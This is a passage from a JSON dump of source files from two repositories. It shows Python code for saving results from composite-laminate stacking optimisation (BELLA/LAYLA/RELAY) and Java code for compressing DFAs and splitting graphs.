expect):\r\n output = calc_distance_2_points(point1, point2)\r\n assert output == expect\r\n\r\n\r\[email protected](\r\n \"\"\"LPs, constraints, expect\"\"\", [\r\n (np.array([0, 0]), Constraints(rule_10_percent=True,\r\n rule_10_Abdalla=True, percent_Abdalla=10), 0),\r\n (np.array([0, 0.7]), Constraints(rule_10_percent=True,\r\n rule_10_Abdalla=True, percent_Abdalla=10), 0.1),\r\n ])\r\n\r\ndef test_calc_distance_Abdalla(LPs, constraints, expect):\r\n output = calc_distance_Abdalla(LPs, constraints)\r\n assert abs(output - expect) < 1e-5\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5491710305213928,
"alphanum_fraction": 0.5613218545913696,
"avg_line_length": 37.137779235839844,
"blob_id": "34ad8ba6fe493dbc6d10d543b3fd92072faf6889",
"content_id": "5bb058a5a11343fe267b9c5315a55d1b4466b3c8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8806,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 225,
"path": "/src/BELLA/save_result.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction to save the results of multi-panel optimisations\r\n\r\n- save_result_BELLAs\r\n saves the results for the design of a multipanel structure\r\n\r\n- save_result_BELLA_one_pdl\r\n saves the results at one iteration of the design of a multipanel\r\n structure\r\n\"\"\"\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.divers.excel import append_df_to_excel\r\nfrom src.buckling.buckling import buckling_factor\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_oopo_mp\r\nfrom src.guidelines.contiguity import calc_penalty_contig_mp\r\nfrom src.guidelines.disorientation import calc_number_violations_diso_mp\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.CLA.ABD import D_from_lampam\r\n\r\ndef save_result_BELLAs(filename, multipanel, constraints, parameters,\r\n obj_func_param, pdl, output, mat=None, only_best=False):\r\n \"\"\"\r\n saves the results for the design of a multipanel structure\r\n \"\"\"\r\n if only_best:\r\n table_res = pd.DataFrame()\r\n if hasattr(output, 'time'):\r\n table_res.loc[0, 'time (s)'] = output.time\r\n table_res = save_result_BELLA_one_pdl(\r\n table_res,\r\n multipanel,\r\n constraints,\r\n parameters,\r\n obj_func_param,\r\n output,\r\n None,\r\n 0,\r\n mat)\r\n append_df_to_excel(\r\n filename, table_res, 'Best Result', index=False, header=True)\r\n return 0\r\n\r\n\r\n for ind in range(parameters.n_ini_ply_drops):\r\n table_res = pd.DataFrame()\r\n table_res = save_result_BELLA_one_pdl(\r\n table_res,\r\n multipanel,\r\n constraints,\r\n parameters,\r\n obj_func_param,\r\n output,\r\n pdl[ind],\r\n ind,\r\n mat)\r\n append_df_to_excel(\r\n filename, table_res, 'Results', index=False, header=True)\r\n # to save best result\r\n table_res = pd.DataFrame()\r\n table_res.loc[0, 'time (s)'] = output.time\r\n table_res = save_result_BELLA_one_pdl(\r\n table_res,\r\n multipanel,\r\n constraints,\r\n parameters,\r\n obj_func_param,\r\n output,\r\n pdl[output.ind_mini],\r\n 0,\r\n mat)\r\n append_df_to_excel(\r\n filename, table_res, 'Best Result', index=False, header=True)\r\n return 0\r\n\r\ndef save_result_BELLA_one_pdl(\r\n table_res, multipanel, constraints, parameters, obj_func_param,\r\n output, pdl=None, ind=0, mat=None):\r\n \"\"\"\r\n saves the results at one iteration of the design of a multipanel\r\n structure\r\n \"\"\"\r\n\r\n if parameters is None:\r\n if multipanel.panels[0].N_x == 0 and multipanel.panels[0].N_y == 0:\r\n save_buckling = False\r\n else:\r\n save_buckling = True\r\n else:\r\n save_buckling = parameters.save_buckling\r\n\r\n if hasattr(output, 'obj_constraints'):\r\n table_res.loc[ind, 'obj_constraints'] \\\r\n = output.obj_constraints_tab[ind]\r\n if hasattr(output, 'n_obj_func_calls_tab'):\r\n table_res.loc[ind, 'n_obj_func_calls'] \\\r\n = output.n_obj_func_calls_tab[ind]\r\n # table_res.loc[ind, 'n_designs_last_level'] \\\r\n # = output.n_designs_last_level_tab[ind]\r\n # table_res.loc[ind, 'n_designs_after_ss_ref_repair'] \\\r\n # = output.n_designs_after_ss_ref_repair_tab[ind]\r\n # table_res.loc[ind, 'n_designs_after_thick_to_thin'] \\\r\n # = output.n_designs_after_thick_to_thin_tab[ind]\r\n # table_res.loc[ind, 'n_designs_after_thin_to_thick'] \\\r\n # = output.n_designs_after_thin_to_thick_tab[ind]\r\n # table_res.loc[ind, 'n_designs_repaired_unique'] \\\r\n # = output.n_designs_repaired_unique_tab[ind]\r\n\r\n table_res.loc[ind, 
'penalty_spacing'] = output.penalty_spacing_tab[ind]\r\n\r\n ss = output.ss\r\n\r\n norm_diso_contig = np.array(\r\n [panel.n_plies for panel in multipanel.panels])\r\n\r\n n_diso = calc_number_violations_diso_mp(ss, constraints)\r\n penalty_diso = np.zeros((multipanel.n_panels,))\r\n if constraints.diso and n_diso.any():\r\n penalty_diso = n_diso / norm_diso_contig\r\n else:\r\n penalty_diso = np.zeros((multipanel.n_panels,))\r\n\r\n n_contig = calc_penalty_contig_mp(ss, constraints)\r\n penalty_contig = np.zeros((multipanel.n_panels,))\r\n if constraints.contig and n_contig.any():\r\n penalty_contig = n_contig / norm_diso_contig\r\n else:\r\n penalty_contig = np.zeros((multipanel.n_panels,))\r\n\r\n lampam = np.array([calc_lampam(ss[ind_panel]) \\\r\n for ind_panel in range(multipanel.n_panels)])\r\n \r\n penalty_10 = np.zeros((multipanel.n_panels,))\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, lampam, mp=True)\r\n else:\r\n penalty_10 = calc_penalty_10_ss(ss, constraints, LPs=None, mp=True)\r\n\r\n penalty_bal_ipo, penalty_oopo = calc_penalty_ipo_oopo_mp(\r\n lampam, constraints)\r\n\r\n for ind_p, panel in enumerate(multipanel.panels):\r\n\r\n table_res.loc[ind + ind_p, 'index panel'] = ind_p + 1\r\n table_res.loc[ind + ind_p, 'n_plies'] = panel.n_plies\r\n if hasattr(output, 'obj_no_constraints'):\r\n table_res.loc[ind + ind_p, 'obj_no_constraints'] \\\r\n = output.obj_no_constraints_tab[ind][ind_p]\r\n table_res.loc[ind + ind_p, 'n_violations_diso'] = n_diso[ind_p]\r\n table_res.loc[ind + ind_p, 'n_violations_contig'] = n_contig[ind_p]\r\n table_res.loc[ind + ind_p, 'ipo: |lampam[3]| + |lampam[4]|'] \\\r\n = abs(lampam[ind_p, 2]) + abs(lampam[ind_p, 3])\r\n table_res.loc[ind + ind_p, 'oopo: |lampam[11]| + |lampam[12]|'] \\\r\n = abs(lampam[ind_p, 10]) + abs(lampam[ind_p, 11])\r\n table_res.loc[ind + ind_p, 'percentage_0_plies'] \\\r\n = sum(output.sst[ind_p] == 0) / (output.sst[ind_p].size)\r\n table_res.loc[ind + ind_p, 'percentage_90_plies'] \\\r\n = sum(output.sst[ind_p] == 90) / (output.sst[ind_p].size)\r\n table_res.loc[ind + ind_p, 'percentage_+45_plies'] \\\r\n = sum(output.sst[ind_p] == 45) / (output.sst[ind_p].size)\r\n table_res.loc[ind + ind_p, 'percentage_-45_plies'] \\\r\n = sum(output.sst[ind_p] == -45) / (output.sst[ind_p].size)\r\n table_res.loc[ind + ind_p, 'percentage_+-45_plies'] \\\r\n = (sum(output.sst[ind_p] == 45) + sum(output.sst[ind_p] == -45)) \\\r\n / (output.sst[ind_p].size)\r\n\r\n table_res.loc[ind + ind_p, 'penalty_diso'] = penalty_diso[ind_p]\r\n table_res.loc[ind + ind_p, 'penalty_contig'] = penalty_contig[ind_p]\r\n table_res.loc[ind + ind_p, 'penalty_10'] = penalty_10[ind_p]\r\n table_res.loc[ind + ind_p, 'penalty_ipo'] = penalty_bal_ipo[ind_p]\r\n table_res.loc[ind + ind_p, 'penalty_oopo'] = penalty_oopo[ind_p]\r\n\r\n if save_buckling:\r\n table_res.loc[ind + ind_p, 'n_plies_'] = panel.n_plies\r\n table_res.loc[ind + ind_p, 'lambda buckling'] = buckling_factor(\r\n lampam=lampam[ind_p],\r\n mat=mat,\r\n n_plies=output.ss[ind_p].size,\r\n N_x=panel.N_x,\r\n N_y=panel.N_y,\r\n length_x=panel.length_x,\r\n length_y=panel.length_y,\r\n n_modes=10)\r\n\r\n for angle in constraints.set_of_angles:\r\n table_res.loc[ind + ind_p, 'n_' + str(angle) + 'plies'] \\\r\n = sum(output.sst[ind_p] == angle)\r\n\r\n for ind_lp in range(12):\r\n table_res.loc[\r\n ind + ind_p, 'lampam_error[' + str(ind_lp + 1) + ']'] = \\\r\n abs(panel.lampam_target[ind_lp] - lampam[ind_p, ind_lp])\r\n\r\n 
for ind_lp in range(12):\r\n table_res.loc[\r\n ind + ind_p, 'lampam[' + str(ind_lp + 1) + ']'] = \\\r\n lampam[ind_p, ind_lp]\r\n \r\n D = D_from_lampam(lampam[ind_p], mat) \r\n D_11 = D[0, 0]\r\n D_22 = D[1, 1]\r\n D_16 = D[0, 2]\r\n D_26 = D[1, 2]\r\n \r\n table_res.loc[ind + ind_p, 'gamma'] = abs(D_16/(( (D_11**3) * D_22 )**(1/4)))\r\n table_res.loc[ind + ind_p, 'delta'] = abs(D_26/(( (D_22**3) * D_11 )**(1/4)))\r\n \r\n stack = ' '.join(np.array(output.sst[ind_p], dtype=str))\r\n table_res.loc[\r\n ind + ind_p, 'stacking sequences with ply drops included'] = stack\r\n\r\n stack = ' '.join(np.array(output.ss[ind_p], dtype=str))\r\n table_res.loc[ind + ind_p, 'stacking sequences'] = stack\r\n\r\n if pdl is not None:\r\n stack = ' '.join(np.array(pdl[ind_p]).astype(str))\r\n table_res.loc[ ind + ind_p, 'initial ply drop layout'] = stack\r\n \r\n\r\n return table_res\r\n"
},
{
"alpha_fraction": 0.6121515035629272,
"alphanum_fraction": 0.6188098192214966,
"avg_line_length": 37.3934440612793,
"blob_id": "d510ae202ed79f6f3b1785464b6b87be6b5e5a09",
"content_id": "93e71efc6626df1cc82e21c4fe5fe715e5b95e5a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2403,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 61,
"path": "/src/LAYLA_V02/results.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for the results of an optimisation with LAYLA\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n#import sys\r\n#sys.path.append(r'C:\\BELLA_and_LAYLA')\r\n#from src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\nclass LAYLA_Results():\r\n \" An object for storing the results of an optimisation with LAYLA\"\r\n def __init__(self, parameters, targets):\r\n \"Initialise the results of an optimisation with LAYLA\"\r\n self.completed = False\r\n # solution stacking sequence\r\n self.ss_best = None\r\n # solution lamination parameters\r\n self.lampam_best = None\r\n # solution objective\r\n self.objective = None\r\n # stacking sequence solutions at each outer step\r\n self.ss_tab = np.zeros((\r\n parameters.n_outer_step, targets.n_plies), int)\r\n # solution lamination parameters at each outer step\r\n self.lampam_tab_tab = np.zeros((\r\n parameters.n_outer_step, 12), float)\r\n # solution objectives at each outer step\r\n self.obj_tab = np.NaN*np.ones((\r\n parameters.n_outer_step,), float)\r\n# # number of objective function evaluations at each outer step\r\n# self.n_obj_func_calls_tab = np.NaN*np.ones((\r\n# parameters.n_outer_step,), int)\r\n # numbers of stacks at the last level of the last group search\r\n self.n_designs_last_level_tab = np.NaN*np.ones((\r\n parameters.n_outer_step,), int)\r\n # numbers of repaired stacks at the last level of the last group search\r\n self.n_designs_repaired_tab = np.NaN*np.ones((\r\n parameters.n_outer_step,), int)\r\n # numbers of unique repaired stacks at the last group search\r\n self.n_designs_repaired_unique_tab = np.NaN*np.ones((\r\n parameters.n_outer_step,), int)\r\n # numbers of outer steps performed\r\n self.number_of_outer_steps_performed = None\r\n # number of the outer step that finds the best solution\r\n self.n_outer_step_best_solution = None\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f'''\r\nResults with LAYLA:\r\n\r\n Stacking sequence: {self.ss_best}\r\n Lamination parameters 1-4: {self.lampam_best[:4]}\r\n Lamination parameters 5-8: {self.lampam_best[4:8]}\r\n Lamination parameters 9-12: {self.lampam_best[8:]}\r\n'''\r\n"
},
{
"alpha_fraction": 0.6113550662994385,
"alphanum_fraction": 0.6257842183113098,
"avg_line_length": 36.878047943115234,
"blob_id": "b8d950e8970afc92659c1c3ff7459ab62ab1199b",
"content_id": "2a3dd57d85de95054e5599fb7ca7d62a2637cd6f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3188,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 82,
"path": "/src/RELAY/repair_membrane.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nrepair for membrane properties\r\n\r\n- repair_membrane\r\n repairs a laminate to improve its in-plane stiffness properties\r\n\r\n- repair_membrane_1:\r\n repair for membrane properties only accounting for one panel\r\n\r\n- repair_membrane_2:\r\n repair for membrane properties accounting for all the panels\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.RELAY.repair_membrane_1_ipo import repair_membrane_1_ipo\r\nfrom src.RELAY.repair_membrane_1_no_ipo import repair_membrane_1_no_ipo\r\nfrom src.RELAY.repair_membrane_1_ipo_Abdalla import repair_membrane_1_ipo_Abdalla\r\nfrom src.RELAY.repair_membrane_1_no_ipo_Abdalla \\\r\nimport repair_membrane_1_no_ipo_Abdalla\r\nfrom src.RELAY.repair_10_bal import calc_lampamA_ply_queue\r\n\r\ndef repair_membrane(\r\n ss, ply_queue, mini_10, in_plane_coeffs, constraints, parameters,\r\n obj_func_param=None, multipanel=None, lampam_target=None):\r\n \"\"\"\r\n repairs a laminate to improve its in-plane stiffness properties\r\n \"\"\"\r\n if not multipanel is None:\r\n if not parameters.repair_membrane_switch \\\r\n or np.isclose(np.array([0, 0, 0, 0], float), in_plane_coeffs).all():\r\n ss_list = [ss] # no in-plane optimisation required\r\n ply_queue_list = [ply_queue]\r\n lampamA_list = [\r\n calc_lampamA_ply_queue(ss, ss.size, ply_queue, constraints)]\r\n else:\r\n ss_list, ply_queue_list, lampamA_list, _ = repair_membrane_1(\r\n ss, ply_queue, mini_10,\r\n in_plane_coeffs, parameters.p_A,\r\n lampam_target, constraints)\r\n return ss_list, ply_queue_list, lampamA_list\r\n\r\n if not parameters.repair_membrane_switch \\\r\n or np.isclose(np.array([0, 0, 0, 0], float), in_plane_coeffs).all():\r\n ss_list = [ss] # no in-plane optimisation required\r\n ply_queue_list = [ply_queue]\r\n lampamA_list = [\r\n calc_lampamA_ply_queue(ss, ss.size, ply_queue, constraints)]\r\n else:\r\n ss_list, ply_queue_list, lampamA_list, _ = repair_membrane_1(\r\n ss, ply_queue, mini_10,\r\n in_plane_coeffs, parameters.p_A,\r\n lampam_target, constraints)\r\n return ss_list, ply_queue_list, lampamA_list\r\n\r\n\r\ndef repair_membrane_1(\r\n ss, ply_queue, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints):\r\n \"\"\"\r\n repair for membrane properties only accounting for one panel\r\n \"\"\"\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla:\r\n if constraints.ipo:\r\n return repair_membrane_1_ipo_Abdalla(\r\n ss, ply_queue, in_plane_coeffs, p_A, lampam_target,\r\n constraints)\r\n return repair_membrane_1_no_ipo_Abdalla(\r\n ss, ply_queue, in_plane_coeffs, p_A, lampam_target, constraints)\r\n\r\n if constraints.ipo:\r\n return repair_membrane_1_ipo(\r\n ss, ply_queue, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints)\r\n return repair_membrane_1_no_ipo(\r\n ss, ply_queue, mini_10, in_plane_coeffs,\r\n p_A, lampam_target, constraints)\r\n"
}
    ] | 67 | notantony/dpi-fp | https://github.com/notantony/dpi-fp | 9f185870ce8a18e7149b70d593d938e57fcb810e | e099fde11aaaddad1e394dc3be27a67f8fc2bf1d | 26a3ca6eac91ac5dbedc36b8c92a56db148a73aa | refs/heads/master | 2023-01-23T15:57:30.805714 | 2020-11-18T17:15:47 | 2020-11-18T17:15:47 | 279149964 | 0 | 0 | null | 2020-07-12T21:20:54 | 2020-10-28T09:00:06 | 2020-10-28T09:00:29 | Java | [
{
"alpha_fraction": 0.360883504152298,
"alphanum_fraction": 0.3619522750377655,
"avg_line_length": 39.68115997314453,
"blob_id": "0ec37fd39e875f7c0865c7b28b7b1b72371def05",
"content_id": "9136c31816d7d7e73efb60c6f63f8d9d2c95075f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 2807,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 69,
"path": "/src/main/java/automaton/algo/compressor/heuristic/DfaCompressorOld.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.heuristic;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport automaton.transition.Transitions;\n\nimport java.util.ArrayList;\nimport java.util.HashMap;\nimport java.util.List;\nimport java.util.Map;\n\npublic class DfaCompressorOld {\n public void compress(Dfa dfa) {\n boolean found = true;\n while (found) {\n found = false;\n List<Node> nodes = new ArrayList<>(dfa.allNodes());\n for (int i = 0; !found && i < nodes.size(); i++) {\n Node a = nodes.get(i);\n if (a.isTerminal()) {\n continue;\n }\n Map<Character, Node> aEdges = a.getEdges();\n for (int j = 0; !found && j < i; j++) {\n Node b = nodes.get(j);\n if (b.isTerminal()) {\n continue;\n }\n Map<Character, Node> bEdges = b.getEdges();\n boolean failed = false;\n for (char c = 0; c <= Transitions.MAX_CHAR; c++) {\n if (aEdges.containsKey(c) && bEdges.containsKey(c) &&\n aEdges.get(c) != bEdges.get(c)) {\n failed = true;\n }\n }\n if (!failed) {\n System.out.println(\"fix: \" + a.hashCode() + \" \" + b.hashCode());\n found = true;\n Node newNode = new Node();\n aEdges.forEach((c, target) -> {\n newNode.addEdge(c, (target == a || target == b) ? newNode : target);\n });\n bEdges.forEach((c, target) -> {\n newNode.addEdge(c, (target == a || target == b) ? newNode : target);\n });\n for (Node node: nodes) {\n if (node == a || node == b) {\n continue;\n }\n Map<Character, Node> updated = new HashMap<>();\n node.getEdges().forEach((c, target) -> {\n if (target == a || target == b) {\n updated.put(c, newNode);\n } else {\n updated.put(c, target);\n }\n });\n node.setEdges(updated);\n }\n if (dfa.getStart() == a || dfa.getStart() == b) {\n dfa.setStart(newNode);\n }\n }\n }\n }\n }\n }\n}\n"
},
{
"alpha_fraction": 0.4931289553642273,
"alphanum_fraction": 0.4976215660572052,
"avg_line_length": 36.84000015258789,
"blob_id": "d9a9f2c90ccb20b58360cf3303f9dd398c6c29af",
"content_id": "93e24a921120067a0727fbe0a2158f938ee95ddd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 3784,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 100,
"path": "/src/main/java/intgraph/GreedySplitter.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package intgraph;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class GreedySplitter {\n private List<List<Integer>> result = new ArrayList<>();\n private List<List<Integer>> lastSets = new ArrayList<>();\n private HashSet<IntGraph.IntNode> curNodes;\n\n public List<List<Integer>> split(IntGraph graph) {\n curNodes = new HashSet<>(graph.nodes);\n int sum = 0;\n while (sum < graph.nodes.size()) {\n List<Integer> group = splitIter(graph);\n curNodes.removeAll(group.stream().map(a -> graph.nodes.get(a)).collect(Collectors.toList()));\n sum += group.size();\n result.add(group);\n// Logger.getGlobal().info(\"Added group\");\n }\n\n return result;\n }\n\n public List<Integer> splitIter(IntGraph graph) {\n HashMap<Integer, Integer> penalty = new HashMap<>();\n\n PriorityQueue<IntGraph.IntNode> queue = new PriorityQueue<>(20, new Comparator<IntGraph.IntNode>() {\n @Override\n public int compare(IntGraph.IntNode o1, IntGraph.IntNode o2) {\n return Integer.compare(o1.edges.size() - penalty.getOrDefault(o1.id, 0),\n o2.edges.size() - penalty.getOrDefault(o2.id, 0));\n }\n });\n queue.addAll(curNodes);\n\n List<Integer> group = new ArrayList<>();\n\n List<Integer> resultLastSet = null;\n while (!queue.isEmpty()) {\n IntGraph.IntNode cur = queue.remove();\n group.add(cur.id);\n\n// System.err.print(cur.edges.size() - penalty.getOrDefault(cur.id, 0) + \" \");\n\n List<Integer> lastSet = new ArrayList<>();\n\n cur.edges.forEach(neighbour -> {\n if (queue.remove(graph.nodes.get(neighbour))) {\n lastSet.add(neighbour);\n }\n graph.nodes.get(neighbour).edges.remove(cur.id);\n });\n\n lastSet.forEach(neighbour -> {\n// if (!queue.contains(graph.nodes.get(neighbour))) {\n// return;\n// }\n graph.nodes.get(neighbour).edges.forEach(nNeighbour -> {\n// if (nNeighbour != cur.id) {\n penalty.put(nNeighbour, penalty.getOrDefault(nNeighbour, 0) + 1);\n if (queue.remove(graph.nodes.get(nNeighbour))) {\n queue.add(graph.nodes.get(nNeighbour));\n }\n// }\n });\n });\n\n lastSet.add(cur.id);\n\n// if (queue.size() == 0) {\n// HashSet<Integer> here = new HashSet<>(lastSet);\n// lastSet.forEach(x -> {\n// long nn = graph.nodes.get(x).edges.stream()\n// .filter(here::contains)\n// .count();\n// if (nn != here.size()) {\n// System.err.println(nn);\n// System.err.println(here.size());\n//// System.err.println(cur.edges.stream().filter(here::contains).count());\n//// System.err.println(cur.id);\n//// System.err.println(x);\n//// System.err.println(cur.edges.size() - penalty.getOrDefault(cur.id, 0));\n//// System.err.println(graph.nodes.get(x).edges.size() - penalty.getOrDefault(x, 0));\n// throw new RuntimeException(\"s\");\n// }\n// });\n// }\n\n resultLastSet = lastSet;\n }\n assert resultLastSet != null;\n lastSets.add(resultLastSet);\n return group;\n }\n\n public List<List<Integer>> getLastSets() {\n return lastSets;\n }\n}\n"
},
{
"alpha_fraction": 0.43415454030036926,
"alphanum_fraction": 0.43654730916023254,
"avg_line_length": 32.885887145996094,
"blob_id": "534264f1b4b0a2f5bfb6b52d098d0df1e9445aad",
"content_id": "b12df6f04290a484bae8e34891ea4d9ebe46bbe9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 11284,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 333,
"path": "/src/main/java/automaton/algo/compressor/recursive/RecursiveCompressorOld.java",
"repo_name": "notantony/dpi-fp",
"src_encoding": "UTF-8",
"text": "package automaton.algo.compressor.recursive;\n\nimport automaton.dfa.Dfa;\nimport automaton.dfa.Node;\nimport util.Pair;\n\nimport java.util.*;\nimport java.util.stream.Collectors;\n\npublic class RecursiveCompressorOld {\n private Dfa dfa;\n private HashMap<Node, Integer> index;\n private ArrayList<Node> nodes;\n private byte[][] distinct; // -1 <-> independent, 1 <-> dependent, 0 <-> not available\n private Map<Node, Set<Pair<Character, Node>>> mp;\n private MergeGraph mergeQueue;\n\n// private byte[][] __debugDistinct;\n// private byte\n\n private byte checkInd(int i, int j) {\n if (distinct[i][j] != 0) {\n return distinct[i][j];\n }\n if (i < j) {\n int tmp = i;\n i = j;\n j = tmp;\n }\n Node a = nodes.get(i);\n Node b = nodes.get(j);\n if (a.getEdges().size() > b.getEdges().size()) {\n Node tmp = a;\n a = b;\n b = tmp;\n }\n// Node finalB = b;\n// a.getEdges().forEach((c, targetA) -> {\n for (Map.Entry<Character, Node> entry : a.getEdges().entrySet()) {\n char c = entry.getKey();\n Node targetA = entry.getValue();\n if (b.getEdges().containsKey(c)) {\n byte result = checkInd(index.get(targetA), index.get(b.getEdges().get(c)));\n if (result == 1) {\n return distinct[i][j] = 1;\n }\n }\n }\n return distinct[i][j] = -1;\n }\n\n private void buildMatrix() {\n nodes = new ArrayList<>(dfa.allNodes());\n index = new HashMap<>();\n int counter = 0;\n for (Node node : nodes) {\n index.put(node, counter);\n counter++;\n }\n\n mp = new HashMap<>();\n for (Node node : nodes) {\n mp.put(node, new HashSet<>());\n }\n for (Node node : nodes) {\n node.getEdges().forEach((c, target) -> {\n mp.get(target).add(new Pair<>(c, node));\n });\n }\n\n distinct = new byte[nodes.size()][nodes.size()];\n Queue<Pair<Integer, Integer>> queue = new ArrayDeque<>();\n\n for (int i = 0; i < nodes.size(); i++) {\n if (!nodes.get(i).isTerminal()) {\n continue;\n }\n assert nodes.get(i).getTerminal().size() == 1;\n for (int j = 0; j < i; j++) {\n if (nodes.get(i).isTerminal() && nodes.get(j).isTerminal()) {\n assert !nodes.get(i).getTerminal().equals(nodes.get(j).getTerminal());\n distinct[i][j] = 1;\n queue.add(new Pair<>(i, j));\n }\n }\n// if (nodes.get(i).isTerminal()) {\n// distinct[i][i] = 1;\n// queue.add(new Pair<>(i, i));\n// }\n }\n\n HashMap<Character, HashSet<Integer>>[] incident = new HashMap[nodes.size()];\n for (int i = 0; i < incident.length; i++) {\n incident[i] = new HashMap<>();\n }\n for (int i = 0; i < nodes.size(); i++) {\n int finalI = i;\n mp.get(nodes.get(i)).forEach(pair -> {\n incident[finalI].putIfAbsent(pair.getFirst(), new HashSet<>());\n incident[finalI].get(pair.getFirst()).add(index.get(pair.getSecond()));\n });\n }\n\n\n while (!queue.isEmpty()) {\n Pair<Integer, Integer> cur = queue.remove();\n int i = Integer.max(cur.getFirst(), cur.getSecond());\n int j = Integer.min(cur.getFirst(), cur.getSecond());\n incident[i].keySet().stream()\n .filter(incident[j]::containsKey)\n .forEach(c -> {\n incident[i].get(c).forEach(a -> {\n incident[j].get(c).forEach(b -> {\n int targetA = Integer.max(a, b);\n int targetB = Integer.min(a, b);\n if (distinct[targetA][targetB] == 0) {\n distinct[targetA][targetB] = 1;\n queue.add(new Pair<>(targetA, targetB));\n }\n });\n });\n });\n }\n for (int i = 0; i < nodes.size(); i++) {\n for (int j = 0; j < i; j++) {\n if (distinct[i][j] == 0) {\n distinct[i][j] = -1;\n// checkInd(i, j);\n }\n }\n }\n }\n\n private List<Pair<Integer, Integer>> mergePair(int aId, int bId) {\n assert !nodes.get(aId).isTerminal() : \"Found terminal: \" + 
nodes.get(aId).getTerminal();\n assert !nodes.get(bId).isTerminal() : \"Found terminal: \" + nodes.get(bId).getTerminal();\n ArrayList<Pair<Integer, Integer>> needsMerge = new ArrayList<>();\n Node a = nodes.get(aId);\n Node b = nodes.get(bId);\n Map<Character, Node> aEdges = a.getEdges();\n Map<Character, Node> bEdges = b.getEdges();\n\n aEdges.forEach((c, target) -> {\n if (bEdges.containsKey(c)) {\n Node conflict = bEdges.get(c);\n int conflictId = index.get(conflict);\n needsMerge.add(new Pair<>(index.get(target), conflictId));\n }\n if (target == a) {\n b.addEdge(c, b);\n } else {\n boolean removed = mp.get(target).remove(new Pair<>(c, a));\n assert removed;\n mp.get(target).add(new Pair<>(c, b));\n b.addEdge(c, target);\n }\n });\n for (Pair<Character, Node> pair : mp.get(a)) {\n pair.getSecond().addEdge(pair.getFirst(), b);\n }\n mp.get(b).addAll(mp.get(a).stream().map(pair -> {\n if (pair.getSecond() == a) {\n return new Pair<>(pair.getFirst(), b);\n }\n return pair;\n }).collect(Collectors.toSet()));\n\n nodes.set(aId, null);\n if (dfa.getStart() == a) {\n dfa.setStart(b);\n }\n return needsMerge;\n }\n\n private void mergeAll(Set<Integer> mergeSet) { // TODO: faster & parallel implementation using streams?\n int bId = mergeSet.stream().min(Integer::compareTo).get();\n mergeSet.stream()\n .filter(id -> id != bId)\n .flatMap(id -> mergePair(id, bId).stream())\n .peek(pair -> {\n if (mergeSet.contains(pair.getFirst())) {\n pair.setFirst(bId);\n }\n if (mergeSet.contains(pair.getSecond())) {\n pair.setSecond(bId);\n }\n })\n .distinct()\n .forEach(pair -> mergeQueue.addPair(pair.getFirst(), pair.getSecond()));\n// Map<Character, Node> bEdges = b.getEdges();\n// bEdges.\n//// Node b = nodes.get(j);\n//\n//// if (a == null) {\n//// while (a)\n//// }\n//\n//// assert distinct[i][j] == -1; // TODO: necessary, but not enough\n//\n// for (int i = 1; i < mergeList.size(); i++) {\n// Node a = nodes.get(mergeList.get(i));\n//\n// a.getEdges().forEach((c, target) -> {\n// int targetId = index.get(target);\n//\n// if (bEdges.containsKey(c)) {\n// Node conflictTarget = bEdges.get(c);\n// if (mergeSet.contains(index.get(conflictTarget))) {\n// conflictTarget = b;\n// } else {\n//\n// }\n// } else {\n//\n// }\n//\n// if (mergeSet.contains(targetId)) {\n// b.addEdge(c, b);\n// } else {\n// boolean removed = mp.get(target).remove(new Pair<>(c, a));\n// assert removed; // TODO: add to other implementations?\n// mp.get(target).add(new Pair<>(c, b));\n// if (bEdges.containsKey(c)) {\n// if (bEdges.get(c) == target) {\n// b.addEdge(c, target);\n// } else {\n// mergeQueue.addPair(targetId, a.getEdges().get(c));\n// }\n// }\n// }\n// });\n// for (Pair<Character, Node> pair : mp.get(a)) {\n// pair.getSecond().addEdge(pair.getFirst(), b);\n// }\n// mp.get(b).addAll(mp.get(a).stream().map(pair -> {\n// if (pair.getSecond() == a) {\n// return new Pair<>(pair.getFirst(), b);\n// }\n// return pair;\n// 